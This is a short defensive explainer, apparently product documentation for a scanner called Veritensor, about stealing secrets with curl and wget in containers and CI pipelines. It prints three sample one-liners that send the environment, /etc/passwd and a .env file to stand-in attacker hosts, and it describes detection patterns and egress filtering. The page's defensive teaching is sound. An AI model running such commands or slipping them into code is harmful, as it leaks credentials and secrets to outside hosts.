Skip to main content

Data Exfiltration via Curl and Wget

Living off the Land

Attackers don't always install custom malware. They prefer "Living off the Land" (LotL)—using tools that are already installed on your server.

In Linux environments (including Docker containers and CI runners), curl and wget are almost always present.

The Exfiltration Pattern

An attacker who gains code execution (via a poisoned model or a bad dependency) wants to steal your secrets (AWS keys, ENV vars).

The simplest way is an HTTP request:

# Sending environment variables to a webhook
curl -X POST https://attacker.com/leak -d "$(env)"

Or using wget:

wget https://attacker.com/leak?data=$(cat /etc/passwd)

CI/CD Pipeline Risks

This is extremely common in Supply Chain Attacks on CI/CD. A malicious test script in a pull request might run: curl -d @.env https://evil.com

If your pipeline has access to production secrets, they are gone in milliseconds.

Detection

Veritensor scans scripts (.sh, .py, .ipynb) for suspicious usage of these tools.

  • We look for curl or wget combined with environment variables or sensitive file paths.
  • We flag usage of known "leak bin" domains (like pastebin, requestbin).

Mitigation

  1. Egress Filtering: Configure your firewall to allow outbound connections only to trusted domains (e.g., PyPI, Hugging Face, AWS). Block everything else.
  2. Static Analysis: Use Veritensor to catch these commands in code reviews before they merge.